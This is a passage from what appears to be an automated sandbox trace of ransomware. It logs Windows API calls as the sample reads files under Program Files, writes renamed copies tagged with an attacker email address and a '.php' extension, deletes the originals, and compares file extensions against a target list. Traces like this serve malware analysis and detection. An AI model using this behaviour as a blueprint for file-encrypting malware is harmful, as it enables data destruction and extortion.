lpNumberOfBytesWritten=0x332fc9c*=0xe2b0, lpOverlapped=0x0) returned 1 [0049.338] ReadFile (in: hFile=0x1e8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.338] WriteFile (in: hFile=0x20c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.338] SetEndOfFile (hFile=0x20c) returned 1 [0049.338] CloseHandle (hObject=0x20c) returned 1 [0049.338] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.338] SetEndOfFile (hFile=0x1e8) returned 1 [0049.339] CloseHandle (hObject=0x1e8) returned 1 [0049.339] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.339] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm")) returned 1 [0049.340] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.340] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.340] lstrlenW (lpString=".doc") returned 4 [0049.340] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.340] lstrlenW (lpString=".docx") returned 5 [0049.340] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.340] lstrlenW (lpString=".pdf") returned 4 [0049.340] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.340] lstrlenW (lpString=".xls") returned 4 [0049.340] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.340] lstrlenW (lpString=".xlsx") returned 5 [0049.340] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.340] lstrlenW (lpString=".ppt") returned 4 [0049.340] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.340] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.340] lstrlenW (lpString=".zip") returned 4 [0049.340] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.340] lstrlenW (lpString=".rar") returned 4 [0049.340] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.340] lstrlenW (lpString=".bz2") returned 4 [0049.340] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.340] lstrlenW (lpString=".7z") returned 3 [0049.340] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.340] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.340] lstrlenW (lpString=".dbf") returned 4 [0049.340] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.340] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.340] lstrlenW (lpString=".1cd") returned 4 [0049.340] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.340] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0049.340] lstrlenW (lpString=".jpg") returned 4 [0049.340] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.341] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=944994) returned 1 [0049.341] CloseHandle (hObject=0x1e8) returned 1 [0049.341] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm")) returned 0x20 [0049.341] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.341] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0049.341] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.341] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.341] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0049.342] GetLastError () returned 0x0 [0049.342] ReadFile (in: hFile=0x1e8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0xe6b62, lpOverlapped=0x0) returned 1 [0049.359] WriteFile (in: hFile=0x20c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe6b70, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe6b70, lpOverlapped=0x0) returned 1 [0049.573] ReadFile (in: hFile=0x1e8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.573] WriteFile (in: hFile=0x20c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.573] SetEndOfFile (hFile=0x20c) returned 1 [0049.573] CloseHandle (hObject=0x20c) returned 1 [0049.573] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.573] SetEndOfFile (hFile=0x1e8) returned 1 [0049.581] CloseHandle (hObject=0x1e8) returned 1 [0049.581] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.581] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm")) returned 1 [0049.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.581] lstrlenW (lpString=".doc") returned 4 [0049.581] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.581] lstrlenW (lpString=".docx") returned 5 [0049.581] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.581] lstrlenW (lpString=".pdf") returned 4 [0049.581] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.582] lstrlenW (lpString=".xls") returned 4 [0049.582] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.582] lstrlenW (lpString=".xlsx") returned 5 [0049.582] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.582] lstrlenW (lpString=".ppt") returned 4 [0049.582] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.582] lstrlenW (lpString=".zip") returned 4 [0049.582] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.582] lstrlenW (lpString=".rar") returned 4 [0049.582] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.582] lstrlenW (lpString=".bz2") returned 4 [0049.582] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.582] lstrlenW (lpString=".7z") returned 3 [0049.582] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.582] lstrlenW (lpString=".dbf") returned 4 [0049.582] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.582] lstrlenW (lpString=".1cd") returned 4 [0049.582] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0049.582] lstrlenW (lpString=".jpg") returned 4 [0049.582] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.682] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=751669) returned 1 [0049.682] CloseHandle (hObject=0x210) returned 1 [0049.682] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png")) returned 0x20 [0049.682] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.682] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.682] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0049.682] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0049.682] lstrlenW (lpString=".doc") returned 4 [0049.683] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0049.683] lstrlenW (lpString=".docx") returned 5 [0049.683] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0049.683] lstrlenW (lpString=".pdf") returned 4 [0049.683] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0049.683] lstrlenW (lpString=".xls") returned 4 [0049.683] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0049.683] lstrlenW (lpString=".xlsx") returned 5 [0049.683] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0049.683] lstrlenW (lpString=".ppt") returned 4 [0049.683] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0049.683] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0049.683] lstrlenW (lpString=".zip") returned 4 [0049.683] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0049.683] lstrlenW (lpString=".rar") returned 4 [0049.683] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0049.683] lstrlenW (lpString=".bz2") returned 4 [0049.683] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0049.683] lstrlenW (lpString=".7z") returned 3 [0049.683] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0049.683] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0049.683] lstrlenW (lpString=".dbf") returned 4 [0049.683] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0049.683] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0049.683] lstrlenW (lpString=".1cd") returned 4 [0049.683] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0049.683] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 51 [0049.683] lstrlenW (lpString=".jpg") returned 4 [0049.683] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0050.985] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0050.985] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0050.985] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0050.986] lstrlenW (lpString=".doc") returned 4 [0050.986] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0050.986] lstrlenW (lpString=".docx") returned 5 [0050.986] lstrcmpiW (lpString1=".docx", lpString2="e.wmv") returned -1 [0050.986] lstrlenW (lpString=".pdf") returned 4 [0050.986] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0050.986] lstrlenW (lpString=".xls") returned 4 [0050.986] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0050.986] lstrlenW (lpString=".xlsx") returned 5 [0050.986] lstrcmpiW (lpString1=".xlsx", lpString2="e.wmv") returned -1 [0050.986] lstrlenW (lpString=".ppt") returned 4 [0050.986] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0050.986] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0050.986] lstrlenW (lpString=".zip") returned 4 [0050.986] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0050.986] lstrlenW (lpString=".rar") returned 4 [0050.986] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0050.986] lstrlenW (lpString=".bz2") returned 4 [0050.986] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0050.986] lstrlenW (lpString=".7z") returned 3 [0050.986] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0050.986] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0050.986] lstrlenW (lpString=".dbf") returned 4 [0050.986] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0050.986] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0050.986] lstrlenW (lpString=".1cd") returned 4 [0050.986] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0050.986] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0050.986] lstrlenW (lpString=".jpg") returned 4 [0050.986] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0050.987] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0050.987] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0050.987] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0050.987] lstrlenW (lpString=".doc") returned 4 [0050.987] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0050.987] lstrlenW (lpString=".docx") returned 5 [0050.987] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0050.987] lstrlenW (lpString=".pdf") returned 4 [0050.987] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0050.987] lstrlenW (lpString=".xls") returned 4 [0050.987] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0050.987] lstrlenW (lpString=".xlsx") returned 5 [0050.987] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0050.987] lstrlenW (lpString=".ppt") returned 4 [0050.987] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0050.987] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0050.987] lstrlenW (lpString=".zip") returned 4 [0050.987] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0050.987] lstrlenW (lpString=".rar") returned 4 [0050.987] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0050.987] lstrlenW (lpString=".bz2") returned 4 [0050.987] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0050.987] lstrlenW (lpString=".7z") returned 3 [0050.987] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0050.987] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0050.987] lstrlenW (lpString=".dbf") returned 4 [0050.987] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0050.987] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0050.987] lstrlenW (lpString=".1cd") returned 4 [0050.988] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0050.988] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0050.988] lstrlenW (lpString=".jpg") returned 4 [0050.988] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0052.959] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=30948) returned 1 [0052.959] CloseHandle (hObject=0x218) returned 1 [0052.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl")) returned 0x20 [0052.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0052.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0052.959] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.959] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0052.960] GetLastError () returned 0x0 [0052.960] ReadFile (in: hFile=0x218, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x78e4, lpOverlapped=0x0) returned 1 [0052.965] WriteFile (in: hFile=0x1a4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x78f0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x78f0, lpOverlapped=0x0) returned 1 [0052.966] ReadFile (in: hFile=0x218, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.966] WriteFile (in: hFile=0x1a4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.966] SetEndOfFile (hFile=0x1a4) returned 1 [0052.967] CloseHandle (hObject=0x1a4) returned 1 [0052.967] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.967] SetEndOfFile (hFile=0x218) returned 1 [0052.968] CloseHandle (hObject=0x218) returned 1 [0052.968] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0052.968] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl")) returned 1 [0052.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0052.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0052.969] lstrlenW (lpString=".doc") returned 4 [0052.969] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0052.969] lstrlenW (lpString=".docx") returned 5 [0052.969] lstrcmpiW (lpString1=".docx", lpString2="x.xsl") returned -1 [0052.969] lstrlenW (lpString=".pdf") returned 4 [0052.969] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0052.969] lstrlenW (lpString=".xls") returned 4 [0052.969] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0052.969] lstrlenW (lpString=".xlsx") returned 5 [0052.969] lstrcmpiW (lpString1=".xlsx", lpString2="x.xsl") returned -1 [0052.969] lstrlenW (lpString=".ppt") returned 4 [0052.969] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0052.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0052.969] lstrlenW (lpString=".zip") returned 4 [0052.969] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0052.969] lstrlenW (lpString=".rar") returned 4 [0052.969] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0052.969] lstrlenW (lpString=".bz2") returned 4 [0052.969] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0052.969] lstrlenW (lpString=".7z") returned 3 [0052.969] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0052.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0052.969] lstrlenW (lpString=".dbf") returned 4 [0052.969] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0052.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0052.969] lstrlenW (lpString=".1cd") returned 4 [0052.969] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0052.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 80 [0052.969] lstrlenW (lpString=".jpg") returned 4 [0052.969] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0052.971] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.971] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0052.972] GetLastError () returned 0x0 [0052.972] ReadFile (in: hFile=0x1a4, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x2340, lpOverlapped=0x0) returned 1 [0052.973] WriteFile (in: hFile=0x220, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x2350, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x2350, lpOverlapped=0x0) returned 1 [0052.975] ReadFile (in: hFile=0x1a4, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.975] WriteFile (in: hFile=0x220, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.975] SetEndOfFile (hFile=0x220) returned 1 [0052.975] CloseHandle (hObject=0x220) returned 1 [0052.975] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.975] SetEndOfFile (hFile=0x1a4) returned 1 [0052.976] CloseHandle (hObject=0x1a4) returned 1 [0052.976] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 